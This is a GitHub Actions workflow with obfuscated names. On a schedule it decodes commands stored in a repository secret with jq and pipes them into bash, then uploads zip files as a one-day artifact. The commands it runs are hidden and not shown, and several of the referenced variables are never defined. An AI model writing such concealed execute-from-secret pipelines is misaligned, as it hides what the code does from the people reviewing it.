name: julinjinjia
on:
  workflow_dispatch:

  schedule:
    - cron: '40 3,9,15,21 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: julinjinjia
        env:
          ej441: ${{ secrets.ej441 }}
        run: |
          printf '%s' "$ej441" | jq -r .hlyr2 | /bin/bash
          echo $krwt1970 | jq -r .rlpjd4 | /bin/bash
          echo $e890 | jq -r .fhbg919 | /bin/bash
          printf '%s' "$m9724" | jq -r .qy662 | /bin/bash

      - name: Upload artifact
        uses: actions/upload-artifact@v4
        with:
          name: fvcVNASo
          path: "*.zip"
          retention-days: 1
